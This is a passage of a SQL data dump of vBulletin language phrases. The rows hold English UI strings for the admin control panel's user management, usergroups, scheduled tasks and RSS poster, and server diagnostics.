(33909, -1, 'userid_is_greater_than', 'cpuser', 'User ID is greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1201024413, '3.7.0 Beta 5'),
(33910, -1, 'userid_is_less_than', 'cpuser', 'User ID is less than', 'vbulletin', 'vBulletin Solutions', 1201024391, '3.7.0 Beta 5'),
(33911, -1, 'users_awaiting_moderation', 'cpuser', 'Users Awaiting Moderation', 'vbulletin', '', 0, ''),
(33912, -1, 'users_with_x_private_messages_stored', 'cpuser', 'Users with {1} Private Messages Stored', 'vbulletin', '', 0, ''),
(33913, -1, 'view_change_history', 'cpuser', 'View change history', 'vbulletin', 'vBulletin Solutions', 1190725796, '3.7.0 Beta 1'),
(33914, -1, 'view_forum_permissions', 'cpuser', 'View Forum Permissions', 'vbulletin', '', 0, ''),
(33915, -1, 'view_infractions', 'cpuser', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1157136526, '3.6.1'),
(33916, -1, 'view_ip_addresses', 'cpuser', 'View IP Addresses', 'vbulletin', '', 0, ''),
(33917, -1, 'view_join_requests', 'cpuser', 'View Join Requests', 'vbulletin', '', 0, ''),
(33918, -1, 'view_other_ip_addresses_for_this_user', 'cpuser', 'View Other IP Addresses for this User', 'vbulletin', '', 0, ''),
(33919, -1, 'view_private_message_statistics', 'cpuser', 'View Private Message Statistics', 'vbulletin', '', 0, ''),
(33920, -1, 'view_social_groups_created_by_user', 'cpuser', 'View Social Groups Created by User', 'vbulletin', 'vBulletin Solutions', 1200321670, '3.7.0 Beta 4'),
(33921, -1, 'visitor_messages_sent_by_the_user', 'cpuser', 'Visitor Messages sent by the User', 'vbulletin', 'vBulletin Solutions', 1222174733, '3.8.0 Alpha 2'),
(33922, -1, 'warning', 'cpuser', 'Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33923, -1, 'warnings', 'cpuser', 'Warnings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33924, -1, 'warnings_are_greater_than', 'cpuser', 'Warnings are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33925, -1, 'warnings_are_less_than', 'cpuser', 'Warnings are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33926, -1, 'yahoo_id', 'cpuser', 'Yahoo! ID', 'vbulletin', '', 0, ''),
(33927, -1, 'yes_but_not_parsing_html', 'cpuser', 'Yes, but not parsing HTML', 'vbulletin', '', 0, ''),
(33928, -1, 'you_may_not_delete_move_this_user', 'cpuser', 'You may not delete/move this user - The user is either:\\n\\n1) An Administrator\\n2) A Super-Moderator\\n3) A Moderator\\n4) Undeletable User (config.php)\\n5) You!', 'vbulletin', '', 0, ''),
(33929, -1, 'add_new_usergroup', 'cpusergroup', 'Add New Usergroup', 'vbulletin', '', 0, ''),
(33930, -1, 'add_new_usergroup_leader', 'cpusergroup', 'Add New Usergroup Leader', 'vbulletin', '', 0, ''),
(33931, -1, 'add_usergroup_leader', 'cpusergroup', 'Add Usergroup Leader', 'vbulletin', '', 0, ''),
(33932, -1, 'are_you_sure_want_to_delete_promotion_usergroup_x', 'cpusergroup', 'Are you sure you want to delete the promotion from the usergroup called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33933, -1, 'are_you_sure_want_to_delete_usergroup_leader_x', 'cpusergroup', 'Are you sure you want to delete the usergroup leader called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33934, -1, 'are_you_sure_want_to_delete_usergroup_x', 'cpusergroup', 'Are you sure you want to delete the usergroup called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(33935, -1, 'create_permissions_based_off_of_forum', 'cpusergroup', 'Create Forum Permissions Based off of Usergroup:', 'vbulletin', 'vBulletin Solutions', 1200352357, '3.7.0 Beta 4'),
(33936, -1, 'create_usergroup_based_off_of_usergroup', 'cpusergroup', 'Create Usergroup Based off of Usergroup:', 'vbulletin', '', 0, ''),
(33937, -1, 'custom_usergroups', 'cpusergroup', 'Custom Usergroups', 'vbulletin', '', 0, ''),
(33938, -1, 'days_registered', 'cpusergroup', 'Days Registered', 'vbulletin', '', 0, ''),
(33939, -1, 'default_usergroups', 'cpusergroup', 'Default Usergroups', 'vbulletin', '', 0, ''),
(33940, -1, 'delete_usergroup', 'cpusergroup', 'Delete Usergroup', 'vbulletin', '', 0, ''),
(33941, -1, 'edit_usergroup', 'cpusergroup', 'Edit Usergroup', 'vbulletin', '', 0, ''),
(33942, -1, 'processing_join_requests', 'cpusergroup', 'Processing Join Requests', 'vbulletin', '', 0, ''),
(33943, -1, 'promotion', 'cpusergroup', 'Promotion', 'vbulletin', '', 0, ''),
(33944, -1, 'public_group_settings', 'cpusergroup', 'Public Group Settings', 'vbulletin', '', 0, ''),
(33945, -1, 'public_joinable_custom_usergroup', 'cpusergroup', 'Public (Joinable) Custom Usergroups', 'vbulletin', '', 0, ''),
(33946, -1, 'show_all_additional_users', 'cpusergroup', 'Show All Additional Users', 'vbulletin', '', 0, ''),
(33947, -1, 'show_all_primary_users', 'cpusergroup', 'Show All Primary Users', 'vbulletin', '', 0, ''),
(33948, -1, 'usergroup_manager', 'cpusergroup', 'Usergroup Manager', 'vbulletin', '', 0, ''),
(33949, -1, 'view_join_requests', 'cpusergroup', 'View Join Requests', 'vbulletin', '', 0, ''),
(33950, -1, 'view_reputation', 'cpusergroup', 'View Reputation', 'vbulletin', '', 0, ''),
(33951, -1, 'active', 'cron', 'Active', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33952, -1, 'add_new_scheduled_task', 'cron', 'Add New Scheduled Task', 'vbulletin', '', 0, ''),
(33953, -1, 'allow_html_in_announcements', 'cron', 'Allow HTML in Announcements\r\nStrongly not recommended - see Help ', 'vbulletin', 'vBulletin Solutions', 1149685038, '3.6.0 Beta 1'),
(33954, -1, 'are_you_sure_want_to_delete_rssfeed_x', 'cron', 'Are you sure you want to delete the RSS feed called \'{1}\'? \r\n \r\nDeleting this item will not remove any threads, posts or announcements posted from the feed. Please use the regular moderation tools if you wish to remove these.', 'vbulletin', 'vBulletin Solutions', 1149590219, '3.6.0 Beta 1'),
(33955, -1, 'are_you_sure_you_want_to_delete_this_scheduled_task', 'cron', 'Are you sure you want to delete this Scheduled Task?', 'vbulletin', '', 0, ''),
(33956, -1, 'body_template', 'cron', 'Body Template', 'vbulletin', 'vBulletin Solutions', 1149265052, '3.6.0 Beta 1'),
(33957, -1, 'check_feed_every', 'cron', 'Check Feed Every...', 'vbulletin', 'vBulletin Solutions', 1149264951, '3.6.0 Beta 1'),
(33958, -1, 'close_thread_after_delay', 'cron', 'Close Thread After Delay', 'vbulletin', 'vBulletin Solutions', 1149684742, '3.6.0 Beta 1'),
(33959, -1, 'convert_html_to_bbcode', 'cron', 'Convert HTML to BB Code.\r\nIf this is enabled then the setting \"Allow HTML in Announcements\" will be ignored ', 'vbulletin', 'vBulletin Solutions', 1150889935, '3.6.0 Beta 3'),
(33960, -1, 'day_abbr', 'cron', 'D', 'vbulletin', 'vBulletin Solutions', 1149703360, '3.6.0 Beta 1'),
(33961, -1, 'day_of_month', 'cron', 'Day of the Month', 'vbulletin', '', 0, ''),
(33962, -1, 'day_of_week', 'cron', 'Day of the Week (Note: this overrides the \'day of the month\' option) ', 'vbulletin', '', 0, ''),
(33963, -1, 'days_for_announcement_to_remain_active', 'cron', 'Days for Announcement to Remain Active', 'vbulletin', 'vBulletin Solutions', 1149265119, '3.6.0 Beta 1'),
(33964, -1, 'dow_acronym', 'cron', 'DoW', 'vbulletin', 'vBulletin Solutions', 1149703374, '3.6.0 Beta 1'),
(33965, -1, 'edit_rss_feed', 'cron', 'Edit RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149264837, '3.6.0 Beta 1'),
(33966, -1, 'feed_is_enabled', 'cron', 'Feed is Enabled', 'vbulletin', 'vBulletin Solutions', 1149264926, '3.6.0 Beta 1'),
(33967, -1, 'feed_supports_content_encoded', 'cron', 'This feed supports content:encoded . Your imported feeds may appear nicer if you use {feed:content:encoded} in your bodytemplate instead of {feed:description} and enable the Convert HTML to BB Code option.', 'vbulletin', 'vBulletin Solutions', 1193148264, '3.7.0 Beta 1'),
(33968, -1, 'friday_abbr', 'cron', 'Fri', 'vbulletin', '', 0, ''),
(33969, -1, 'hour_abbr', 'cron', 'h', 'vbulletin', 'vBulletin Solutions', 1149703354, '3.6.0 Beta 1'),
(33970, -1, 'last_checked', 'cron', 'Last Checked', 'vbulletin', 'vBulletin Solutions', 1149265149, '3.6.0 Beta 1'),
(33971, -1, 'log_phrase', 'cron', 'Log Phrase', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33972, -1, 'make_thread_sticky', 'cron', 'Make Thread Sticky', 'vbulletin', 'vBulletin Solutions', 1149265106, '3.6.0 Beta 1'),
(33973, -1, 'match_all_words', 'cron', 'Match All Words', 'vbulletin', 'vBulletin Solutions', 1220363305, '3.8.0 Alpha 1'),
(33974, -1, 'maximum_items_to_fetch', 'cron', 'Maximum Items to Fetch\r\nAny items above this number found in the feed will be ignored. ', 'vbulletin', 'vBulletin Solutions', 1149265006, '3.6.0 Beta 1'),
(33975, -1, 'min_abbr', 'cron', 'm', 'vbulletin', 'vBulletin Solutions', 1149703346, '3.6.0 Beta 1'),
(33976, -1, 'moderate_thread', 'cron', 'Moderate Thread\r\nIf set to \'Yes\', threads will be invisible when posted until authorized by a board staff member. ', 'vbulletin', 'vBulletin Solutions', 1149414097, '3.6.0 Beta 1'),
(33977, -1, 'monday_abbr', 'cron', 'Mon', 'vbulletin', '', 0, ''),
(33978, -1, 'month_abbr', 'cron', 'M', 'vbulletin', 'vBulletin Solutions', 1149703366, '3.6.0 Beta 1'),
(33979, -1, 'next_time', 'cron', 'Next Time', 'vbulletin', '', 0, ''),
(33980, -1, 'note_prefix_must_allowed_forum', 'cron', 'Note: the prefix you choose must be allowed in the destination forum!', 'vbulletin', 'vBulletin Solutions', 1190043549, '3.7.0 Beta 1'),
(33981, -1, 'post_items_as_announcements', 'cron', 'Post Items as Announcements', 'vbulletin', 'vBulletin Solutions', 1149265088, '3.6.0 Beta 1'),
(33982, -1, 'post_items_as_threads', 'cron', 'Post Items as Threads', 'vbulletin', 'vBulletin Solutions', 1149265072, '3.6.0 Beta 1'),
(33983, -1, 'preview_feed', 'cron', 'Preview Feed', 'vbulletin', 'vBulletin Solutions', 1149265128, '3.6.0 Beta 1'),
(33984, -1, 'reset_last_checked_time', 'cron', 'Reset Last Checked Time', 'vbulletin', 'vBulletin Solutions', 1149264909, '3.6.0 Beta 1'),
(33985, -1, 'rss_feed', 'cron', 'RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149265138, '3.6.0 Beta 1'),
(33986, -1, 'rss_templates_description', 'cron', 'The two templates listed here are used for the title (title template) and body (body template) of messages posted by the RSS poster. \r\n \r\nYou can specify exactly how these items appear and any item from a feed can be inserted by using {feed:fieldname } where \'fieldname\' corresponds to one of the following: title, description, link, id, date, enclosure_href and content:encoded.', 'vbulletin', 'vBulletin Solutions', 1193148575, '3.7.0 Beta 1'),
(33987, -1, 'rssfeed_body_template', 'cron', '{feed:description}\r\n\r\n[url={feed:link}]More...[/url]', 'vbulletin', 'vBulletin Solutions', 1193148743, '3.7.0 Beta 1'),
(33988, -1, 'rssfeed_title_template', 'cron', '{feed:title}', 'vbulletin', 'vBulletin Solutions', 1193148816, '3.7.0 Beta 1'),
(33989, -1, 'run_now', 'cron', 'Run Now', 'vbulletin', '', 0, ''),
(33990, -1, 'run_scheduled_task_now', 'cron', 'Run Scheduled Task Now', 'vbulletin', 'vBulletin Solutions', 1149589372, '3.6.0 Beta 1'),
(33991, -1, 'saturday_abbr', 'cron', 'Sat', 'vbulletin', '', 0, ''),
(33992, -1, 'scheduled_task', 'cron', 'Scheduled Task', 'vbulletin', '', 0, ''),
(33993, -1, 'scheduled_task_manager', 'cron', 'Scheduled Task Manager', 'vbulletin', '', 0, ''),
(33994, -1, 'scheduled_tasks', 'cron', 'Scheduled Tasks', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33995, -1, 'search_item_body', 'cron', 'Search Item Body', 'vbulletin', 'vBulletin Solutions', 1220441505, '3.8.0 Alpha 1'),
(33996, -1, 'search_items_for_words', 'cron', 'Search Items for Words\r\nOnly insert items if they contain one or more of these words. Put a space or a new line between each search word. You can create a phrase with multiple words by enclosing them in double quotes. ', 'vbulletin', 'vBulletin Solutions', 1220437646, '3.8.0 Alpha 1'),
(33997, -1, 'sunday_abbr', 'cron', 'Sun', 'vbulletin', '', 0, ''),
(33998, -1, 'task_activate_desc', 'cron', 'This script sends reminder emails to users in the Awaiting Confirmation usergroup. An email is sent one day after the user has registered and again at five days.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33999, -1, 'task_activate_log', 'cron', 'Activation Reminder Emails sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34000, -1, 'task_activate_title', 'cron', 'Activation Reminder Email', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34001, -1, 'task_attachmentviews_desc', 'cron', 'This script updates attachment views once an hour if the delayed attachment views option is enabled. This is suggested for forums with a large number of attachments or users.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34002, -1, 'task_attachmentviews_log', 'cron', 'Attachment Views Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34003, -1, 'task_attachmentviews_title', 'cron', 'Attachment Views', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34004, -1, 'task_birthday_desc', 'cron', 'Sends emails to users on their birthday.', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'),
(34005, -1, 'task_birthday_log', 'cron', 'Birthday Email Sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'),
(34006, -1, 'task_birthday_title', 'cron', 'Birthdays', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'),
(34007, -1, 'task_ccbill_desc', 'cron', 'This script is only needed if you enable the CCBill payment processor. It will contact the CCBill server to check for reversed payments and update your subscriptions accordingly.', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'),
(34008, -1, 'task_ccbill_log', 'cron', 'CCBill: {1}', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'),
(34009, -1, 'task_ccbill_title', 'cron', 'CCBill Reversal Check', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'),
(34010, -1, 'task_cleanup2_desc', 'cron', 'This script performs various cleanup tasks once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34011, -1, 'task_cleanup2_log', 'cron', 'Hourly Cleanup #2 Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34012, -1, 'task_cleanup2_title', 'cron', 'Hourly Cleanup #2', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34013, -1, 'task_cleanup_desc', 'cron', 'This script performs various cleanup tasks once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34014, -1, 'task_cleanup_log', 'cron', 'Hourly Cleanup #1 Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34015, -1, 'task_cleanup_title', 'cron', 'Hourly Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34016, -1, 'task_dailycleanup_desc', 'cron', 'This script performs various cleanup tasks once per day.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34017, -1, 'task_dailycleanup_log', 'cron', 'Daily Cleanup Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34018, -1, 'task_dailycleanup_title', 'cron', 'Daily Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34019, -1, 'task_digestdaily_desc', 'cron', 'This script sends out new post and new thread digests once per day.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34020, -1, 'task_digestdaily_log', 'cron', 'Daily Digest Sent', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34021, -1, 'task_digestdaily_title', 'cron', 'Daily Digest', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34022, -1, 'task_digestweekly_desc', 'cron', 'This script sends out new post and new thread digests once per week.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34023, -1, 'task_digestweekly_log', 'cron', 'Weekly Digest Sent', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34024, -1, 'task_digestweekly_title', 'cron', 'Weekly Digest', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34025, -1, 'task_infractions_desc', 'cron', 'Removes expired infractions twice an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34026, -1, 'task_infractions_log', 'cron', 'Infraction Expired for: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34027, -1, 'task_infractions_title', 'cron', 'Infractions Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34028, -1, 'task_promotion_desc', 'cron', 'This script performs usergroup promotions once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34029, -1, 'task_promotion_log', 'cron', 'Usergroup: {1} {2}; Users: {3}* = Primary Usergroup, % = Secondary Usergroup ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34030, -1, 'task_promotion_title', 'cron', 'User Promotions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34031, -1, 'task_reminder_desc', 'cron', 'This script sends out calendar event reminders twice an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34032, -1, 'task_reminder_log', 'cron', 'Event Reminder Email Sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34033, -1, 'task_reminder_title', 'cron', 'Event Reminder', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34034, -1, 'task_removebans_desc', 'cron', 'This script restores the access of temporarily banned users once an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34035, -1, 'task_removebans_log', 'cron', 'Lifted Ban on Users: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34036, -1, 'task_removebans_title', 'cron', 'Restore Temporarily Banned Users', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34037, -1, 'task_rssposter_desc', 'cron', 'Reads RSS feeds from the internet and inserts them into your board as threads or announcements.', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'),
(34038, -1, 'task_rssposter_log', 'cron', 'Inserted the following: {1}', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'),
(34039, -1, 'task_rssposter_title', 'cron', 'RSS Poster Robot', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'),
(34040, -1, 'task_stats_desc', 'cron', 'This script updates forum stats once per day. These are the stats that are accessed from the Admin Control Panel (New Users, New Threads, New Posts, Active Users).', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34041, -1, 'task_stats_log', 'cron', 'Daily Statistics Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34042, -1, 'task_stats_title', 'cron', 'Daily Statistics Log', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34043, -1, 'task_subscriptions_desc', 'cron', 'Once per day, this script removes expired paid subscriptions as well as sends out reminders about soon to expire subscriptions.', 'vbulletin', 'vBulletin Solutions', 1153130364, '3.6.0 Release Candidate 2'),
(34044, -1, 'task_subscriptions_log', 'cron', 'Paid Subscriptions Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34045, -1, 'task_subscriptions_title', 'cron', 'Subscriptions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34046, -1, 'task_threadviews_desc', 'cron', 'This script updates thread views once per hour. This option is suggested for forums with large numbers of threads or users.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34047, -1, 'task_threadviews_log', 'cron', 'Thread Views Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34048, -1, 'task_threadviews_title', 'cron', 'Thread Views', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34049, -1, 'thread_action_delay', 'cron', 'Thread Action Delay (Hours)\r\nIf you specify a number of hours here, the actions checked below will be performed on the inserted thread after the delay specified. Set to 0 to disable this feature. ', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(34050, -1, 'thursday_abbr', 'cron', 'Thu', 'vbulletin', '', 0, ''),
(34051, -1, 'title_template', 'cron', 'Title Template', 'vbulletin', 'vBulletin Solutions', 1149265040, '3.6.0 Beta 1'),
(34052, -1, 'tuesday_abbr', 'cron', 'Tue', 'vbulletin', '', 0, ''),
(34053, -1, 'unstick_thread_after_delay', 'cron', 'Unstick Sticky Thread After Delay', 'vbulletin', 'vBulletin Solutions', 1149684750, '3.6.0 Beta 1'),
(34054, -1, 'url_of_feed', 'cron', 'URL of Feed', 'vbulletin', 'vBulletin Solutions', 1149264936, '3.6.0 Beta 1'),
(34055, -1, 'wednesday_abbr', 'cron', 'Wed', 'vbulletin', '', 0, ''),
(34056, -1, 'x_hours', 'cron', '{1} Hours', 'vbulletin', 'vBulletin Solutions', 1152888856, '3.6.0 Release Candidate 2'),
(34057, -1, 'x_minutes', 'cron', '{1} Minutes', 'vbulletin', 'vBulletin Solutions', 1149264970, '3.6.0 Beta 1'),
(34058, -1, 'x_unable_to_open_url', 'cron', ' {1} Unable to open URL or no data returned
', 'vbulletin', 'vBulletin Solutions', 1151348283, '3.6.0 Beta 4'),
(34059, -1, 'x_xml_error_y_at_line_z', 'cron', '{1} XML Error: {2} at line {3}
', 'vbulletin', 'vBulletin Solutions', 1151347282, '3.6.0 Beta 4'),
(34060, -1, 'check_mail_server_configured_correctly', 'diagnostic', 'Check your mail server to ensure it is configured correctly to allow PHP to send mail from it. You should also check your mail server\'s error log for more diagnostic information.', 'vbulletin', '', 0, ''),
(34061, -1, 'details', 'diagnostic', 'Details', 'vbulletin', 'vBulletin Solutions', 1147366400, '3.6.0 Beta 1'),
(34062, -1, 'email_sent_check_shortly', 'diagnostic', 'No errors were returned while attempting to send the email. Check {1} shortly to confirm you\'ve received the email. If you don\'t receive the email, try sending the test to a different address. If that fails, check your mail server\'s configuration.', 'vbulletin', '', 0, ''),
(34063, -1, 'email_test_explained', 'diagnostic', 'The goal of this test is to determine whether any vBulletin or PHP settings must be changed to allow the sending of email through vBulletin. To begin, simply enter an email address that you have the ability to access and click Send Email.', 'vbulletin', '', 0, ''),
(34064, -1, 'file_contents_mismatch', 'diagnostic', 'File does not contain expected contents', 'vbulletin', '', 0, ''),
(34065, -1, 'file_copied_to_tmp_dir_now_readable', 'diagnostic', 'After copying the file into the specified \"Safe Mode Temp Directory\", it became readable. Uploads will function, but only when uploading in safe mode is enable.', 'vbulletin', '', 0, ''),
(34066, -1, 'file_copied_to_tmp_dir_now_unreadable', 'diagnostic', 'After copying the file into the specified \"Safe Mode Temp Directory,\" it remained unreadable. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.', 'vbulletin', '', 0, ''),
(34067, -1, 'file_not_found', 'diagnostic', 'File not found', 'vbulletin', '', 0, ''),
(34068, -1, 'file_not_readable', 'diagnostic', 'File not readable', 'vbulletin', 'vBulletin Solutions', 1156955387, '3.6.1'),
(34069, -1, 'file_not_recognized', 'diagnostic', 'File not recognized as part of vBulletin', 'vbulletin', '', 0, ''),
(34070, -1, 'file_upload_setting_off', 'diagnostic', 'File uploads have been turned off via PHP\'s file_uploads setting. This can only be handled by contacting your host and asking them to enable the file_upload setting.', 'vbulletin', '', 0, ''),
(34071, -1, 'file_version_mismatch_x_expected_y', 'diagnostic', 'File version mismatch: found {1}, expected {2}', 'vbulletin', '', 0, ''),
(34072, -1, 'file_versions_explained', 'diagnostic', 'This function will list each of your vBulletin files that is tagged with a different version than your forum is currently at, which is {1} . \r\n \r\nThis tool is intended to verify the integrity of your vBulletin files and only scans files with a limited number of extensions.', 'vbulletin', 'vBulletin Solutions', 1229596855, '3.8.0 Release Candidate 2'),
(34073, -1, 'mail_function_errors_returned_were', 'diagnostic', 'The following errors were outputted by PHP when attempting to send mail:', 'vbulletin', '', 0, ''),
(34074, -1, 'mail_function_returned_error', 'diagnostic', 'The mailing function returned an error while trying to send the mail.', 'vbulletin', '', 0, ''),
(34075, -1, 'mod_security_ajax_issue', 'diagnostic', 'AJAX Unicode Issue', 'vbulletin', 'vBulletin Solutions', 1203957345, '3.7.0 Beta 6'),
(34076, -1, 'mod_security_problem_desc', 'diagnostic', 'The above setting will indicate if mod_security is preventing some AJAX requests from being submitted to vBulletin. If this shows Yes then you either need to disable mod_security or change the AJAX settings with the vBulletin Options and disable Problematic features.', 'vbulletin', 'vBulletin Solutions', 1203959437, '3.7.0 Beta 6'),
(34077, -1, 'module_loaded', 'diagnostic', 'Module Loaded', 'vbulletin', 'vBulletin Solutions', 1203957095, '3.7.0 Beta 6'),
(34078, -1, 'mysql_status', 'diagnostic', 'MySQL Status', 'vbulletin', '', 0, ''),
(34079, -1, 'mysql_variables', 'diagnostic', 'MySQL Variables', 'vbulletin', '', 0, ''),
(34080, -1, 'no_errors_occured_opening_upload', 'diagnostic', 'No errors occurred while opening the uploaded file for reading.', 'vbulletin', '', 0, ''),
(34081, -1, 'open_basedir_in_effect', 'diagnostic', 'PHP\'s open_basedir setting has been set to {1}. The uploaded file was stored outside of this directory and is not readable. You will need to contact your host and ask them to specify upload_tmp_dir with a directory inside {1}. Note that PHP must be able to read and write to this directory.', 'vbulletin', '', 0, ''),
(34082, -1, 'pass', 'diagnostic', 'Pass', 'vbulletin', '', 0, ''),
(34083, -1, 'payment_api_tests', 'diagnostic', 'Payment API Tests', 'vbulletin', 'vBulletin Solutions', 1147366109, '3.6.0 Beta 1'),
(34084, -1, 'pertinent_php_settings', 'diagnostic', 'Pertinent PHP Settings', 'vbulletin', '', 0, ''),
(34085, -1, 'pertinent_smtp_settings', 'diagnostic', 'Pertinent SMTP Settings', 'vbulletin', '', 0, ''),
(34086, -1, 'problematic_server_modules', 'diagnostic', 'Problematic Webserver Modules', 'vbulletin', 'vBulletin Solutions', 1203957445, '3.7.0 Beta 6'),
(34087, -1, 'problematic_server_modules_explained', 'diagnostic', 'Some server modules can cause asymptomatic problems with vBulletin, these diagnostics will help identify if the modules are installed.', 'vbulletin', 'vBulletin Solutions', 1203957591, '3.7.0 Beta 6'),
(34088, -1, 'safe_mode_dir_not_dir', 'diagnostic', 'The \"Safe Mode Temp Directory\" you have specified ({1}) does not appear to be a directory. Please specify the correct directory and attempt this test again.', 'vbulletin', '', 0, ''),
(34089, -1, 'safe_mode_enabled_no_tmp_dir', 'diagnostic', 'You have safe mode uploading enabled but have not specified \"Safe Mode Temp Directory\". Please specify one on the options page and attempt this test again.', 'vbulletin', '', 0, ''),
(34090, -1, 'safe_mode_not_writeable', 'diagnostic', 'The \"Safe Mode Temp Directory\" you have specified ({1}) is not writeable by PHP. You will most likely need to make this directory world writeable. Correct this and attempt this test again.', 'vbulletin', '', 0, ''),
(34091, -1, 'scanned_x_files', 'diagnostic', 'Scanned {1} files', 'vbulletin', '', 0, ''),
(34092, -1, 'server_information_desc', 'diagnostic', 'While not exactly a test, this function is helpful for tracking down server issues. Simply select the appropriate type of information and submit the form.', 'vbulletin', '', 0, ''),
(34093, -1, 'smtp_username', 'diagnostic', 'SMTP Username:', 'vbulletin', '', 0, ''),
(34094, -1, 'suhosin_problem_desc', 'diagnostic', 'Suhosin can limit the amount of data submitted and encrypt cookies causing problems with several aspects of vBulletin.', 'vbulletin', 'vBulletin Solutions', 1203957297, '3.7.0 Beta 6'),
(34095, -1, 'suspect_file_versions', 'diagnostic', 'Suspect File Versions', 'vbulletin', '', 0, ''),
(34096, -1, 'system_information', 'diagnostic', 'System Information', 'vbulletin', '', 0, ''),
(34097, -1, 'table_status', 'diagnostic', 'Table Status', 'vbulletin', '', 0, ''),
(34098, -1, 'test_cannot_continue', 'diagnostic', 'The test cannot continue.', 'vbulletin', '', 0, ''),
(34099, -1, 'test_indeterminate_contact_host', 'diagnostic', 'The test was indeterminate. There were problems reading the uploaded file, but none of PHP\'s settings were identified as causing a problem. At this point, you should attempt to attach a file to a post. If that fails, contact your host as no one will know their own server setup better than them.', 'vbulletin', '', 0, ''),
(34100, -1, 'turn_safe_mode_option_off', 'diagnostic', 'You should be able to turn off the \"Upload In Safe Mode?\" option without any adverse effects.', 'vbulletin', '', 0, ''),
